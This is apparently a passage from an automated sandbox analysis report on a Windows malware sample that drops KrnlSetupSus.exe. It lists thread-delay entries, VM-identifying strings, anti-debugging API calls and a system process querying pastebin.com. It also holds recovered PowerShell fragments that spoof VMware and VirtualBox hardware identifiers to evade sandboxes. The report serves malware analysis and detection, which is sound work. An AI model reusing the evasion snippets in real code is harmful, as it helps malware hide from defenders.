                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599781Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599672Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599448Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599338Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599233Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599124Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599015Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598796Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598687Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598578Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598465Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598359Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598248Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598115Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597999Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597777Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597672Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597452Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597343Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597229Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597125Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597014Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596797Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596687Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596578Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596468Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596345Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596218Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596109Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 596000Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 595889Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 595125Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594998Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594781Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594671Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594453Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594343Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594234Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594124Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 594014Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 593906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 593796Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 593687Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: svchost.exe, 00000015.00000000.1538124279.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2791081591.0000024BD362B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                              Source: svchost.exe, 00000015.00000002.2792411923.0000024BD3643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: VMware SATA CD00
                              Source: svchost.exe, 00000012.00000002.2842600921.0000022383012000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: NECVMWarVMware SATA CD00
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                              Source: svchost.exe, 0000002B.00000000.1668423304.000001FC05B00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000000.1667535846.000001FC0522B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2781041464.000001FC05245000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000000.1667574573.000001FC05245000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2779578130.000001FC0522B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: svchost.exe, 00000027.00000002.2774314138.000001A6DDA60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NTFS;;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: svchost.exe, 00000027.00000002.2776549505.000001A6DDB02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.21.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                              Source: svchost.exe, 00000015.00000000.1538023734.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba6
                              Source: dwm.exe, 0000000C.00000003.2106459407.0000026DACB82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                              Source: System.evtx.21.drBinary or memory string: VMCI: Using capabilities (0x1c).
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.drBinary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba68
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                              Source: KrnlSetupSus.exe.0.drBinary or memory string: vmware
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: nonicNECVMWarVMware SATA CD00
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                              Source: svchost.exe, 00000015.00000002.2824460745.0000024BD5025000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
                              Source: svchost.exe, 00000015.00000000.1538941161.0000024BD3FE2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: VMware
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                              Source: svchost.exe, 00000027.00000002.2776549505.000001A6DDB02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                              Source: svchost.exe, 00000027.00000002.2776549505.000001A6DDB02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.21.drBinary or memory string: VMware Virtual disk 2.0 6000c29198182f16b7176b0e680deba6PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                              Source: lsass.exe, 0000000A.00000000.1462343927.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: nonicVMware Virtual disk 6000c29198182f16b7176b0e680deba6
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 00000027.00000002.2775443523.000001A6DDA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
                              Source: KrnlSetupSus.exe.0.drBinary or memory string: awErkRcloZTlIvVMCiVK0
                              Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.21.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: storahciNECVMWarVMware SATA CD00
                              Source: svchost.exe, 00000027.00000002.2774314138.000001A6DDA60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: Microsoft-Windows-Partition%4Diagnostic.evtx.21.drBinary or memory string: VMwareVirtual disk2.06000c29198182f16b7176b0e680deba6PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                              Source: KrnlSetupSus.exe, 00000003.00000002.2829186248.000000001BD52000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462069296.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2780494021.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1466674795.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2773910162.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1503770067.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2777874109.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2765234124.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1510141758.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2784677676.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.1514913660.0000022382041000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: lsass.exe, 0000000A.00000000.1462343927.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                              Source: svchost.exe, 00000027.00000002.2774314138.000001A6DDA60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: LSI_SASVMware Virtual disk 6000c29198182f16b7176b0e680deba6
                              Source: svchost.exe, 00000020.00000002.2770571570.000001EC20C2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                              Source: svchost.exe, 0000000B.00000000.1466851581.000001587065D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 0000001E.00000000.1581250955.0000023314A02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                              Source: lsass.exe, 0000000A.00000000.1462343927.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: dwm.exe, 0000000C.00000003.2106459407.0000026DACB82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.drBinary or memory string: -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                              Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_6-8071
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF7B41 CheckRemoteDebuggerPresent,3_2_00007FFB4ADF7B41
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess queried: DebugPortJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C568270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1C568270
                              Source: C:\ProgramData\Install.exeCode function: 2_2_007C1868 GetProcessHeap,HeapAlloc,StrCpyW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,2_2_007C1868
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C5685D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1C5685D4
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C568270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1C568270
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1C56CB40
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD08270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000290EDD08270
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD085D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000290EDD085D4
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000290EDD0CB40
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E9917585D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000002E9917585D4
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000002E99175CB40
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E991758270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000002E991758270
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCECB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000213BDCECB40
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCE8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000213BDCE8270
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCE85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00000213BDCE85D4
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DCB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000158709DCB40
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709D8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000158709D8270
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709D85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00000158709D85D4
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB15885D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000026DB15885D4
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB1588270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000026DB1588270
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000026DB158CB40
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F0668270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002A3F0668270
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002A3F066CB40
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F06685D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_000002A3F06685D4
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBCB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002C9AFBBCB40
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBB8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002C9AFBB8270
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBB85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000002C9AFBB85D4
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD48270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002C06FD48270
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD485D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000002C06FD485D4
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002C06FD4CB40
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3B85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_000002917C3B85D4
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3B8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000002917C3B8270
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BCB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000002917C3BCB40
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\System32\svchost.exeDomain query: pastebin.com
